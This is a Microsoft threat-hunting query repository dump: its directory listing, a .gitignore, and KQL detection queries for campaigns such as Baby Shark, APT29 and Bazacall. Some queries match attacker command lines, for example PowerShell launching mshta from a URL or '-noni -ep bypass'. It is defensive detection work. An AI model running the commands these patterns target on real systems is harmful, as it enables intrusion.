Showing preview only (6,253K chars total). Download the full file or copy to clipboard to get everything.
Repository: microsoft/WindowsDefenderATP-Hunting-Queries
Branch: master
Commit: efa17a600b43
Files: 386
Total size: 5.9 MB
Directory structure:
gitextract_10u3qxy0/
├── .gitignore
├── 00-query-submission-template.md
├── CODE_OF_CONDUCT.md
├── Campaigns/
│ ├── APT Baby Shark.txt
│ ├── APT29 thinktanks.txt
│ ├── Abuse.ch Recent Threat Feed.md
│ ├── Abusing settingcontent-ms.txt
│ ├── Bazacall/
│ │ ├── Bazacall Emails.md
│ │ ├── Cobalt Strike Lateral Movement.md
│ │ ├── Dropping payload via certutil.md
│ │ ├── Excel Macro Execution.md
│ │ ├── Excel file download domain pattern.md
│ │ ├── Malicious Excel Delivery.md
│ │ ├── NTDS theft.md
│ │ ├── Renamed Rclone Exfil.md
│ │ └── RunDLL Suspicious Network Connection.md
│ ├── Bazarloader/
│ │ ├── Stolen Images Execution.md
│ │ ├── Zip-Doc - Creation of JPG Payload File.md
│ │ └── Zip-Doc - Word Launching MSHTA.md
│ ├── Bear Activity GTR 2019.txt
│ ├── Cloud Hopper.txt
│ ├── DofoilNameCoinServerTraffic.txt
│ ├── Dopplepaymer In-Memory Malware Implant.txt
│ ├── Dragon Fly.txt
│ ├── Elise backdoor.txt
│ ├── Equation Group C2 Communication.txt
│ ├── Hurricane Panda activity.txt
│ ├── Judgement Panda exfil activity.txt
│ ├── Jupyter-Solarmaker/
│ │ ├── deimos-component-execution.md
│ │ ├── evasive-powershell-executions.md
│ │ ├── evasive-powershell-strings.md
│ │ └── successive-tk-domain-calls.md
│ ├── LemonDuck/
│ │ ├── LemonDuck-competition-killer.md
│ │ ├── LemonDuck-component-download-structure.md
│ │ ├── LemonDuck-component-names.md
│ │ ├── LemonDuck-control-structure.md
│ │ ├── LemonDuck-defender-exclusions.md
│ │ ├── LemonDuck-email-subjects.md
│ │ ├── LemonDuck-id-generation.md
│ │ └── LemonDuck-registration-function.md
│ ├── Log4J/
│ │ ├── Alerts related to Log4j vulnerability.md
│ │ ├── Devices with Log4j vulnerability alerts and additional other alert related context.md
│ │ ├── Suspicious JScript staging comment.md
│ │ ├── Suspicious PowerShell curl flags.md
│ │ └── Suspicious process event creation from VMWare Horizon TomcatService.md
│ ├── MacOceanLotusBackdoor.txt
│ ├── MacOceanLotusDropper.txt
│ ├── Macaw Ransomware/
│ │ ├── Disable Controlled Folders.md
│ │ ├── Imminent Ransomware.md
│ │ ├── Inhibit recovery by disabling tools and functionality.md
│ │ ├── Mass account password change.md
│ │ ├── PSExec Attrib commands.md
│ │ └── Use of MSBuild as LOLBin.md
│ ├── OceanLotus registry activity.txt
│ ├── Qakbot/
│ │ ├── Excel launching anomalous processes.md
│ │ ├── General attempts to access local email store.md
│ │ ├── Qakbot Craigslist Domains.md
│ │ ├── Qakbot email theft.md
│ │ └── Qakbot reconnaissance activities.md
│ ├── Ransomware hits healthcare - Alternate Data Streams use.txt
│ ├── Ransomware hits healthcare - Backup deletion.txt
│ ├── Ransomware hits healthcare - Cipher.exe tool deleting data.txt
│ ├── Ransomware hits healthcare - Clearing of system logs.txt
│ ├── Ransomware hits healthcare - Possible compromised accounts.txt
│ ├── Ransomware hits healthcare - Robbinhood activity.txt
│ ├── Ransomware hits healthcare - Turning off System Restore.txt
│ ├── Ransomware hits healthcare - Vulnerable Gigabyte drivers.txt
│ ├── StrRAT malware/
│ │ ├── StrRAT-AV-Discovery.md
│ │ ├── StrRAT-Email-Delivery.md
│ │ └── StrRAT-Malware-Persistence.md
│ ├── Sysrv-botnet/
│ │ ├── app-armor-stopped.md
│ │ ├── java-executing-cmd-to-run-powershell.md
│ │ ├── kinsing-miner-download.md
│ │ ├── oracle-webLogic-executing-powershell.md
│ │ ├── rce-on-vulnerable-server.md
│ │ └── tomcat-8-executing-powershell.md
│ ├── Threat actor Phosphorus masquerading as conference organizers.md
│ ├── WastedLocker Downloader.md
│ ├── ZLoader/
│ │ ├── Malicious bat file.md
│ │ ├── Payload Delivery.md
│ │ └── Suspicious Registry Keys.md
│ ├── apt sofacy zebrocy.txt
│ ├── apt sofacy.txt
│ ├── apt ta17 293a ps.txt
│ ├── apt tropictrooper.txt
│ ├── apt unidentified nov 18.txt
│ ├── c2-lookup-from-nonbrowser[Nobelium].md
│ ├── c2-lookup-response[Nobelium].md
│ ├── cobalt-strike-invoked-w-wmi.md
│ ├── compromised-certificate[Nobelium].md
│ ├── confluence-weblogic-targeted.md
│ ├── cypherpunk-exclusive-commands.md
│ ├── cypherpunk-remote-exec-w-psexesvc.md
│ ├── detect-cyzfc-activity.md
│ ├── fireeye-red-team-tools-CVEs [Nobelium].md
│ ├── fireeye-red-team-tools-HASHs [Nobelium].md
│ ├── known-affected-software-orion[Nobelium].md
│ ├── launching-base64-powershell[Nobelium].md
│ ├── launching-cmd-echo[Nobelium].md
│ ├── locate-dll-created-locally[Nobelium].md
│ ├── locate-dll-loaded-in-memory[Nobelium].md
│ ├── oceanlotus-apt32-files.md
│ ├── oceanlotus-apt32-network.md
│ ├── possible-affected-software-orion[Nobelium].md
│ ├── robbinhood-driver.md
│ ├── robbinhood-evasion.md
│ ├── snip3-aviation-targeting-emails.md
│ ├── snip3-detectsanboxie-function-call.md
│ ├── snip3-encoded-powershell-structure.md
│ ├── snip3-malicious-network-connectivity.md
│ └── snip3-revengerat-c2-exfiltration.md
├── Collection/
│ ├── Anomaly of MailItemAccess by Other Users Mailbox [Nobelium].md
│ ├── HostExportingMailboxAndRemovingExport[Solarigate].md
│ └── MailItemsAccessedTimeSeries[Solarigate].md
├── Command and Control/
│ ├── C2-NamedPipe.md
│ ├── Connection to Rare DNS Hosts.md
│ ├── DNSPattern [Nobelium].md
│ ├── Device network events w low count FQDN.txt
│ ├── EncodedDomainURL [Nobelium].md
│ ├── Tor.txt
│ ├── c2-bluekeep.md
│ ├── check-for-shadowhammer-activity-download-domain.md
│ ├── python-use-by-ransomware-macos.md
│ ├── recon-with-rundll.md
│ └── reverse-shell-ransomware-macos.md
├── Credential Access/
│ ├── Active Directory Sensitive Group Modifications.md
│ ├── Private Key Files.txt
│ ├── cobalt-strike.md
│ ├── doppelpaymer-procdump.md
│ ├── identify-accounts-logged-on-to-endpoints-affected-by-cobalt-strike.md
│ ├── lazagne.md
│ ├── logon-attempts-after-malicious-email.md
│ ├── procdump-lsass-credentials.md
│ ├── wadhrama-credential-dump.md
│ └── wdigest-caching.md
├── Defense evasion/
│ ├── ADFSDomainTrustMods[Nobelium].md
│ ├── Discovering potentially tampered devices [Nobelium].md
│ ├── MailPermissionsAddedToApplication[Nobelium].md
│ ├── PotentialMicrosoftDefenderTampering[Solarigate].md
│ ├── UpdateStsRefreshToken[Solorigate].md
│ ├── alt-data-streams.md
│ ├── clear-system-logs.md
│ ├── deleting-data-w-cipher-tool.md
│ ├── doppelpaymer-stop-services.md
│ ├── hiding-java-class-file.md
│ ├── locate-files-possibly-signed-by-fraudulent-ecc-certificates.md
│ ├── qakbot-campaign-process-injection.md
│ └── qakbot-campaign-self-deletion.md
├── Delivery/
│ ├── Doc attachment with link to download.txt
│ ├── Dropbox downloads linked from other site.txt
│ ├── Email link + download + SmartScreen warning.txt
│ ├── Gootkit-malware.md
│ ├── Open email link.txt
│ ├── Pivot from detections to related downloads.txt
│ ├── Qakbot Craigslist Domains.md
│ ├── detect-jscript-file-creation.md
│ └── powercat-download.md
├── Discovery/
│ ├── Detect-Not-Active-AD-User-Accounts.md
│ ├── DetectTorRelayConnectivity.md
│ ├── DetectTorrentUse.txt
│ ├── Discover hosts doing possible network scans.txt
│ ├── Enumeration of users & groups for lateral movement.txt
│ ├── MultipleLdaps.md
│ ├── MultipleSensitiveLdaps.md
│ ├── PasswordSearch.md
│ ├── PrevalentInteractiveLogons
│ ├── Roasting.md
│ ├── SMB shares discovery.txt
│ ├── SensitiveLdaps.md
│ ├── SuspiciousEnumerationUsingAdfind[Nobelium].md
│ ├── URL Detection.txt
│ ├── VulnComputers.md
│ ├── detect-nbtscan-activity.md
│ ├── detect-suspicious-commands-initiated-by-web-server-processes.md
│ ├── doppelpaymer.md
│ ├── qakbot-campaign-esentutl.md
│ └── qakbot-campaign-outlook.md
├── Email Queries/
│ ├── Appspot Phishing Abuse.md
│ ├── JNLP-File-Attachment.md
│ ├── PhishingEmailUrlRedirector.md
│ └── referral-phish-emails.md
├── Execution/
│ ├── Base64 Detector and Decoder.md
│ ├── Base64encodePEFile.txt
│ ├── Detect Encoded Powershell.md
│ ├── Detect PowerShell v2 Downgrade.md
│ ├── ExecuteBase64DecodedPayload.txt
│ ├── File Copy and Execution.md
│ ├── Malware_In_recyclebin.txt
│ ├── Masquerading system executable.txt
│ ├── Possible Ransomware Related Destruction Activity.md
│ ├── PowerShell downloads.txt
│ ├── PowershellCommand - uncommon commands on machine.txt
│ ├── PowershellCommand footprint.txt
│ ├── Webserver Executing Suspicious Applications.md
│ ├── check-for-shadowhammer-activity-implant.md
│ ├── detect-anomalous-process-trees.md
│ ├── detect-bluekeep-related-mining.md
│ ├── detect-doublepulsar-execution.md
│ ├── detect-exploitation-of-cve-2018-8653.md
│ ├── detect-malcious-use-of-msiexec.md
│ ├── detect-malicious-rar-extraction.md
│ ├── detect-office-products-spawning-wmic.md
│ ├── detect-suspicious-mshta-usage.md
│ ├── detect-web-server-exploit-doublepulsar.md
│ ├── exchange-iis-worker-dropping-webshell.md
│ ├── jse-launched-by-word.md
│ ├── launch-questd-w-osascript.md
│ ├── locate-shlayer-payload-decryption-activity.md
│ ├── locate-shlayer-payload-decrytion-activity.md
│ ├── locate-surfbuyer-downloader-decoding-activity.md
│ ├── office-apps-launching-wscipt.md
│ ├── powershell-activity-after-email-from-malicious-sender.md
│ ├── powershell-version-2.0-execution.md
│ ├── python-based-attacks-on-macos.md
│ ├── qakbot-campaign-suspicious-javascript.md
│ ├── reverse-shell-nishang-base64.md
│ ├── reverse-shell-nishang.md
│ ├── sql-server-abuse.md
│ ├── umworkerprocess-creating-webshell.md
│ └── umworkerprocess-unusual-subprocess-activity.md
├── Exfiltration/
│ ├── 7-zip-prep-for-exfiltration.md
│ ├── Anomaly of MailItemAccess by GraphAPI [Nobelium].md
│ ├── Data copied to other location than C drive.txt
│ ├── Files copied to USB drives.md
│ ├── MailItemsAccessed Throttling [Nobelium].md
│ ├── Map external devices.txt
│ ├── OAuth Apps accessing user mail via GraphAPI [Nobelium].md
│ ├── OAuth Apps reading mail both via GraphAPI and directly [Nobelium].md
│ ├── OAuth Apps reading mail via GraphAPI anomaly [Nobelium].md
│ ├── Password Protected Archive Creation.md
│ ├── Possible File Copy to USB Drive.md
│ ├── detect-archive-exfiltration-to-competitor.md
│ ├── detect-exfiltration-after-termination.md
│ ├── detect-steganography-exfiltration.md
│ └── exchange-powershell-snapin-loaded.md
├── Exploits/
│ ├── AcroRd-Exploits.txt
│ ├── CVE-2021-36934 usage detection.md
│ ├── Electron-CVE-2018-1000006.txt
│ ├── Flash-CVE-2018-4848.txt
│ ├── Linux-DynoRoot-CVE-2018-1111.txt
│ ├── MosaicLoader.md
│ ├── Print Spooler RCE/
│ │ ├── Spoolsv Spawning Rundll32.md
│ │ ├── Suspicious DLLs in spool folder.md
│ │ ├── Suspicious Spoolsv Child Process.md
│ │ └── Suspicious files in spool folder.md
│ ├── SolarWinds -CVE-2021-35211.md
│ ├── printnightmare-cve-2021-1675 usage detection.md
│ ├── winrar-cve-2018-20250-ace-files.md
│ └── winrar-cve-2018-20250-file-creation.md
├── Fun/
│ ├── EmojiHunt.txt
│ ├── HiddenMessage.txt
│ └── Make FolderPath Vogon Poetry.md
├── General queries/
│ ├── Alert Events from Internal IP Address.txt
│ ├── AppLocker Policy Design Assistant.md
│ ├── Baseline Comparison.txt
│ ├── Crashing Applications.md
│ ├── Detect Azure RemoteIP.md
│ ├── Device Count by DNS Suffix.md
│ ├── Device uptime calculation.md
│ ├── Endpoint Agent Health Status Report.md
│ ├── Events surrounding alert.txt
│ ├── Failed Logon Attempt.txt
│ ├── File footprint.txt
│ ├── Firewall Policy Design Assistant.md
│ ├── MD AV Signature and Platform Version.md
│ ├── MITRE - Suspicious Events.txt
│ ├── Machine info from IP address.txt
│ ├── Network footprint.txt
│ ├── Network info of machine.txt
│ ├── Phish and Malware received by user vs total amount of email.md
│ ├── Services.txt
│ ├── System Guard Security Level Baseline.txt
│ ├── System Guard Security Level Drop.txt
│ ├── insider-threat-detection-queries.md
│ └── wifikeys.txt
├── Impact/
│ ├── backup-deletion.md
│ ├── ransom-note-creation-macos.md
│ ├── turn-off-system-restore.md
│ └── wadhrama-data-destruction.md
├── Initial access/
│ ├── Check for Maalware Baazar (abuse.ch) hashes in your mail flow.md
│ ├── Non_intended_user_logon.md
│ ├── PhishingEmailUrlRedirector.md
│ ├── SuspiciousUrlClicked.md
│ ├── WhenZAPed.md
│ ├── detect-bluekeep-exploitation-attempts.md
│ ├── detect-mailsniper.md
│ ├── files-from-malicious-sender.md
│ ├── identify-potential-missed-phishing-email-campaigns.md
│ └── jar-attachments.md
├── LICENSE
├── Lateral Movement/
│ ├── Account brute force.txt
│ ├── Device Logons from Unknown IPs.txt
│ ├── ImpersonatedUserFootprint.md
│ ├── Network Logons with Local Accounts.md
│ ├── Non-local logons with -500 account.txt
│ ├── ServiceAccountsPerformingRemotePS.txt
│ ├── detect-suspicious-rdp-connections.md
│ ├── doppelpaymer-psexec.md
│ └── remote-file-creation-with-psexec.md
├── M365-PowerBi Dashboard/
│ ├── Microsoft Threat Protection - API Dashboard.pbit
│ └── readme.txt
├── Network/
│ └── Defender for Endpoint Telemetry.txt
├── Notebooks/
│ ├── M365D APIs ep3.ipynb
│ ├── WDATP APIs Demo Notebook.ipynb
│ └── mtp_hunting.ipynb
├── Persistence/
│ ├── Accessibility Features.txt
│ ├── AddedCredentialFromContryXAndSigninFromCountryY.md
│ ├── Create account.txt
│ ├── CredentialsAddAfterAdminConsentedToApp[Nobelium].md
│ ├── LocalAdminGroupChanges.txt
│ ├── NewAppOrServicePrincipalCredential[Nobelium].md
│ ├── Possible webshell drop.md
│ ├── detect-prifou-pua.md
│ ├── localAdminAccountLogon.txt
│ ├── qakbot-campaign-registry-edit.md
│ ├── scheduled task creation.txt
│ └── wadhrama-ransomware.md
├── Privilege escalation/
│ ├── Add uncommon credential type to application [Nobelium].md
│ ├── SAM-Name-Changes-CVE-2021-42278.md
│ ├── ServicePrincipalAddedToRole [Nobelium].md
│ ├── cve-2019-0808-c2.md
│ ├── cve-2019-0808-nufsys-file creation.md
│ ├── cve-2019-0808-set-scheduled-task.md
│ ├── dell-driver-vulnerability-2021.md
│ ├── detect-cve-2019-0863-AngryPolarBearBug2-exploit.md
│ ├── detect-cve-2019-0973-installerbypass-exploit.md
│ ├── detect-cve-2019-1053-sandboxescape-exploit.md
│ ├── detect-cve-2019-1069-bearlpe-exploit.md
│ ├── detect-cve-2019-1129-byebear-exploit.md
│ └── locate-ALPC-local-privilege-elevation-exploit.md
├── Protection events/
│ ├── AV Detections with Source.txt
│ ├── AV Detections with USB Disk Drive.txt
│ ├── Antivirus detections.txt
│ ├── ExploitGuardASRStats.txt
│ ├── ExploitGuardAsrDescriptions.txt
│ ├── ExploitGuardBlockOfficeChildProcess.txt
│ ├── ExploitGuardControlledFolderAccess.txt
│ ├── ExploitGuardNetworkProtectionEvents.txt
│ ├── ExploitGuardStats.txt
│ ├── PUA ThreatName per Computer.txt
│ ├── README.md
│ ├── SmartScreen URL block ignored by user.txt
│ ├── SmartScreen app block ignored by user.txt
│ ├── Windows filtering events (Firewall).txt
│ └── WindowsDefenderAVEvents.txt
├── README.md
├── Ransomware/
│ ├── Backup deletion.md
│ ├── Check for multiple signs of ransomware activity.md
│ ├── Clearing of forensic evidence from event logs using wevtutil.md
│ ├── DarkSide.md
│ ├── Deletion of data on multiple drives using cipher exe.md
│ ├── Discovery for highly-privileged accounts.md
│ ├── Distribution from remote location.md
│ ├── Fake Replies.md
│ ├── File Backup Deletion Alerts.md
│ ├── Gootkit File Delivery.md
│ ├── HTA Startup Persistence.md
│ ├── IcedId Delivery.md
│ ├── IcedId attachments.md
│ ├── IcedId email delivery.md
│ ├── LaZagne Credential Theft.md
│ ├── Potential ransomware activity related to Cobalt Strike.md
│ ├── Qakbot discovery activies.md
│ ├── Sticky Keys.md
│ ├── Stopping multiple processes using taskkill.md
│ ├── Stopping processes using net stop.md
│ ├── Suspicious Bitlocker Encryption.md
│ ├── Suspicious Google Doc Links.md
│ ├── Suspicious Image Load related to IcedId.md
│ ├── Turning off System Restore.md
│ └── Turning off services using sc exe.md
├── SECURITY.md
├── TVM/
│ └── devices_with_vuln_and_users_received_payload.md
├── Troubleshooting/
│ ├── Connectivity Failures by Device.md
│ └── Connectivity Failures by Domain.md
└── Webcasts/
├── Airlift 2021 - Lets Invoke.csl
├── Ignite 2020 - Best practices for hunting across domains with Microsoft 365 Defender.txt
├── README.md
├── TrackingTheAdversary/
│ ├── Episode 1 - KQL Fundamentals.txt
│ ├── Episode 2 - Joins.txt
│ ├── Episode 3 - Summarizing, Pivoting, and Joining.txt
│ ├── Episode 4 - Lets Hunt.txt
│ └── README.md
└── l33tSpeak/
├── MCAS - The Hunt.txt
├── Performance, Json and dynamics operator, external data.txt
└── l33tspeak 11 Oct 2021 - externaldata and query partitioning.csl
================================================
FILE CONTENTS
================================================
================================================
FILE: .gitignore
================================================
## Ignore Visual Studio temporary files, build results, and
## files generated by popular Visual Studio add-ons.
##
## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
# User-specific files
*.suo
*.user
*.userosscache
*.sln.docstates
# User-specific files (MonoDevelop/Xamarin Studio)
*.userprefs
# Build results
[Dd]ebug/
[Dd]ebugPublic/
[Rr]elease/
[Rr]eleases/
x64/
x86/
bld/
[Bb]in/
[Oo]bj/
[Ll]og/
# Visual Studio 2015 cache/options directory
.vs/
# Uncomment if you have tasks that create the project's static files in wwwroot
#wwwroot/
# MSTest test Results
[Tt]est[Rr]esult*/
[Bb]uild[Ll]og.*
# NUNIT
*.VisualState.xml
TestResult.xml
# Build Results of an ATL Project
[Dd]ebugPS/
[Rr]eleasePS/
dlldata.c
# .NET Core
project.lock.json
project.fragment.lock.json
artifacts/
**/Properties/launchSettings.json
*_i.c
*_p.c
*_i.h
*.ilk
*.meta
*.obj
*.pch
*.pdb
*.pgc
*.pgd
*.rsp
*.sbr
*.tlb
*.tli
*.tlh
*.tmp
*.tmp_proj
*.log
*.vspscc
*.vssscc
.builds
*.pidb
*.svclog
*.scc
# Chutzpah Test files
_Chutzpah*
# Visual C++ cache files
ipch/
*.aps
*.ncb
*.opendb
*.opensdf
*.sdf
*.cachefile
*.VC.db
*.VC.VC.opendb
# Visual Studio profiler
*.psess
*.vsp
*.vspx
*.sap
# TFS 2012 Local Workspace
$tf/
# Guidance Automation Toolkit
*.gpState
# ReSharper is a .NET coding add-in
_ReSharper*/
*.[Rr]e[Ss]harper
*.DotSettings.user
# JustCode is a .NET coding add-in
.JustCode
# TeamCity is a build add-in
_TeamCity*
# DotCover is a Code Coverage Tool
*.dotCover
# Visual Studio code coverage results
*.coverage
*.coveragexml
# NCrunch
_NCrunch_*
.*crunch*.local.xml
nCrunchTemp_*
# MightyMoose
*.mm.*
AutoTest.Net/
# Web workbench (sass)
.sass-cache/
# Installshield output folder
[Ee]xpress/
# DocProject is a documentation generator add-in
DocProject/buildhelp/
DocProject/Help/*.HxT
DocProject/Help/*.HxC
DocProject/Help/*.hhc
DocProject/Help/*.hhk
DocProject/Help/*.hhp
DocProject/Help/Html2
DocProject/Help/html
# Click-Once directory
publish/
# Publish Web Output
*.[Pp]ublish.xml
*.azurePubxml
# TODO: Comment the next line if you want to checkin your web deploy settings
# but database connection strings (with potential passwords) will be unencrypted
*.pubxml
*.publishproj
# Microsoft Azure Web App publish settings. Comment the next line if you want to
# checkin your Azure Web App publish settings, but sensitive information contained
# in these scripts will be unencrypted
PublishScripts/
# NuGet Packages
*.nupkg
# The packages folder can be ignored because of Package Restore
**/packages/*
# except build/, which is used as an MSBuild target.
!**/packages/build/
# Uncomment if necessary however generally it will be regenerated when needed
#!**/packages/repositories.config
# NuGet v3's project.json files produces more ignorable files
*.nuget.props
*.nuget.targets
# Microsoft Azure Build Output
csx/
*.build.csdef
# Microsoft Azure Emulator
ecf/
rcf/
# Windows Store app package directories and files
AppPackages/
BundleArtifacts/
Package.StoreAssociation.xml
_pkginfo.txt
# Visual Studio cache files
# files ending in .cache can be ignored
*.[Cc]ache
# but keep track of directories ending in .cache
!*.[Cc]ache/
# Others
ClientBin/
~$*
*~
*.dbmdl
*.dbproj.schemaview
*.jfm
*.pfx
*.publishsettings
orleans.codegen.cs
# Since there are multiple workflows, uncomment next line to ignore bower_components
# (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
#bower_components/
# RIA/Silverlight projects
Generated_Code/
# Backup & report files from converting an old project file
# to a newer Visual Studio version. Backup files are not needed,
# because we have git ;-)
_UpgradeReport_Files/
Backup*/
UpgradeLog*.XML
UpgradeLog*.htm
# SQL Server files
*.mdf
*.ldf
*.ndf
# Business Intelligence projects
*.rdl.data
*.bim.layout
*.bim_*.settings
# Microsoft Fakes
FakesAssemblies/
# GhostDoc plugin setting file
*.GhostDoc.xml
# Node.js Tools for Visual Studio
.ntvs_analysis.dat
node_modules/
# Typescript v1 declaration files
typings/
# Visual Studio 6 build log
*.plg
# Visual Studio 6 workspace options file
*.opt
# Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
*.vbw
# Visual Studio LightSwitch build output
**/*.HTMLClient/GeneratedArtifacts
**/*.DesktopClient/GeneratedArtifacts
**/*.DesktopClient/ModelManifest.xml
**/*.Server/GeneratedArtifacts
**/*.Server/ModelManifest.xml
_Pvt_Extensions
# Paket dependency manager
.paket/paket.exe
paket-files/
# FAKE - F# Make
.fake/
# JetBrains Rider
.idea/
*.sln.iml
# CodeRush
.cr/
# Python Tools for Visual Studio (PTVS)
__pycache__/
*.pyc
# Cake - Uncomment if you are using it
# tools/**
# !tools/packages.config
# Telerik's JustMock configuration file
*.jmconfig
# BizTalk build output
*.btp.cs
*.btm.cs
*.odx.cs
*.xsd.cs
================================================
FILE: 00-query-submission-template.md
================================================
# < Insert query name >
< Provide query description and usage tips >
## Query
```
< Insert query string here >
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |
## Contributor info
**Contributor:** < your name >
**GitHub alias:** < your github alias >
**Organization:** < your org >
**Contact info:** < email or website >
================================================
FILE: CODE_OF_CONDUCT.md
================================================
# Microsoft Open Source Code of Conduct
This project has adopted the [Microsoft Open Source Code of Conduct](https://opensource.microsoft.com/codeofconduct/).
Resources:
- [Microsoft Open Source Code of Conduct](https://opensource.microsoft.com/codeofconduct/)
- [Microsoft Code of Conduct FAQ](https://opensource.microsoft.com/codeofconduct/faq/)
- Contact [opencode@microsoft.com](mailto:opencode@microsoft.com) with questions or concerns
================================================
FILE: Campaigns/APT Baby Shark.txt
================================================
// Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_babyshark.yml
// Questions via Twitter: @janvonkirchheim
DeviceProcessEvents
| where Timestamp > ago(7d)
| where ProcessCommandLine =~ @"reg query ""HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default"""
or ProcessCommandLine startswith "powershell.exe mshta.exe http"
or ProcessCommandLine =~ "cmd.exe /c taskkill /im cmd.exe"
| top 100 by Timestamp desc
================================================
FILE: Campaigns/APT29 thinktanks.txt
================================================
// Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_apt29_thinktanks.yml
// Questions via Twitter: @janvonkirchheim
DeviceProcessEvents
| where Timestamp > ago(7d)
| where ProcessCommandLine has "-noni -ep bypass $"
| top 100 by Timestamp desc
================================================
FILE: Campaigns/Abuse.ch Recent Threat Feed.md
================================================
# Abuse.ch Recent Threat Feed
This query will hunt for files matching the current abuse.ch recent threat feed based on Sha256. Currently the query is set up to analyze the last day worth of events, but this is configurable using the MaxAge variable.
## Query
```
let MaxAge = ago(1d);
let AbuseFeed = materialize (
(externaldata(report:string)
[@"https://bazaar.abuse.ch/export/csv/recent/"]
with (format = "txt"))
| where report !startswith '#'
| extend report = parse_csv(report)
| extend FirstSeenUtc = tostring(report[0])
| project FirstSeenUtc = todatetime(FirstSeenUtc)
,SHA256 = trim('[ "]+',tostring(report[1]))
, MD5 = trim('[ "]+',tostring(report[2]))
, SHA1 = trim('[ "]+',tostring(report[3]))
, Reporter = trim('[ "]+',tostring(report[4]))
, FileName = trim('[ "]+',tostring(report[5]))
, FileType = trim('[ "]+',tostring(report[6]))
, MimeType = trim('[ "]+',tostring(report[7]))
, Signer = iff(report[8] == 'n/a', '', trim('[ "]+',tostring(report[8])))
, ClamAV = iff(report[9] == 'n/a', '', trim('[ "]+',tostring(report[9])))
, VTPercent = iff(report[10] == 'n/a', 0.0, todouble(report[10]))
, ImpHash = iff(report[11] == 'n/a', '', trim('[ "]+',tostring(report[11])))
, SSDeep = iff(report[12] == 'n/a', '', trim('[ "]+',tostring(report[12])))
, TLSH = iff(report[13] == 'n/a', '', trim('[ "]+',tostring(report[13])))
);
union (
AbuseFeed
| join (
DeviceProcessEvents
| where Timestamp > MaxAge
) on SHA256
), (
AbuseFeed
| join (
DeviceFileEvents
| where Timestamp > MaxAge
) on SHA256
), (
AbuseFeed
| join (
DeviceImageLoadEvents
| where Timestamp > MaxAge
) on SHA256
)
```
...or if you don't care about the details from Malware Bazaar you might consider this slightly more lightweight version
```
let MaxAge = ago(1d);
let AbuseFeed = toscalar (
(externaldata(report:string)
[@"https://bazaar.abuse.ch/export/txt/sha256/recent/"]
with (format = "txt"))
| where report !startswith '#'
| summarize make_set(report)
);
union (
DeviceProcessEvents
| where Timestamp > MaxAge and SHA256 in (AbuseFeed)
), (
DeviceFileEvents
| where Timestamp > MaxAge and SHA256 in (AbuseFeed)
), (
DeviceImageLoadEvents
| where Timestamp > MaxAge and SHA256 in (AbuseFeed)
)
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | v | |
| Persistence | v | |
| Privilege escalation | v | |
| Defense evasion | | |
| Credential Access | v | |
| Discovery | v | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | v | |
| Vulnerability | | |
| Exploit | v | |
| Misconfiguration | | |
| Malware, component | v | |
| Ransomware | v | |
## Contributor info
**Contributor:** Michael Melone
**GitHub alias:** mjmelone
**Organization:** Microsoft
**Contact info:** @PowershellPoet
================================================
FILE: Campaigns/Abusing settingcontent-ms.txt
================================================
// Sample query that search for .settingcontent-ms that has been downloaded from the web
// through Microsoft Edge, Internet Explorer, Google Chrome, Mozilla Firefox, Microsoft Outlook
// For questions @MiladMSFT on Twitter or milad.aslaner@microsoft.com
DeviceFileEvents
| where InitiatingProcessFileName in~ ("browser_broker.exe", "chrome.exe", "iexplore.exe", "firefox.exe", "outlook.exe")
| where FileName endswith ".settingcontent-ms"
// The FileOrigin* columns are available only on Edge and Chrome and from Windows 10 version 1703
// https://techcommunity.microsoft.com/t5/Threat-Intelligence/Hunting-tip-of-the-month-Browser-downloads/td-p/220454
| project Timestamp, DeviceName, FileName, FolderPath, FileOriginUrl, FileOriginReferrerUrl, FileOriginIP
================================================
FILE: Campaigns/Bazacall/Bazacall Emails.md
================================================
# Bazacall emails
Bazacall malware uses emails that contain a phone number for the user to call in order to cancel a fake subscription. These emails contain no links or attachments, and use automatic payment lures to trick users into contacting the number included in the email.
## Query
This query looks for the subject lines associated with known Bazacall emails, using a regex to match on the fake account number pattern and a few keywords that are frequently used in these subjects. NOTE: Some emails contain the fake account number in the body of the email rather than the subject. In these instances, searching on keyword alone may surface related emails. Verify maliciousness by matching the regex for the account number in the body of the email if possible.
```
EmailEvents
| where Subject matches regex @"[A-Z]{1,3}\d{9,15}"
and Subject has_any('trial', 'free', 'demo', 'membership', 'premium', 'gold', 'notification', 'notice', 'claim', 'order', 'license', 'licenses')
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | v | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/Bazacall/Cobalt Strike Lateral Movement.md
================================================
# Bazacall Cobalt Strike Lateral Movement
Microsoft has observed Bazacall using Cobalt Strike in order to move laterally to other machines on the network.
## Query
This query looks for alerts related to Cobalt Strike and its built-in PSExec used for lateral movement.
```
AlertInfo
| where Title in("File dropped and launched from remote location", "Suspicious transfer of an executable file")
// Joining in instances where Cobalt Strike's built-in PsExec is used for lateral movement
